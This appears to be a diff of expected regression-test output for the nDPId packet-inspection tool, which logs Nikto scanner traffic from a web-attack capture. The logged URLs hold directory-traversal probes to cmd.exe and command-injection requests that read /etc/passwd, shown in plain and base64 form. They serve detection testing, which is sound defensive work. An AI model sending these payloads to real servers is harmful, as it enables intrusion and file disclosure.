 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}}
+01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}}
+01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}}
+01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}}
+01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}}
+01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}}
+01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}}
+01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}}
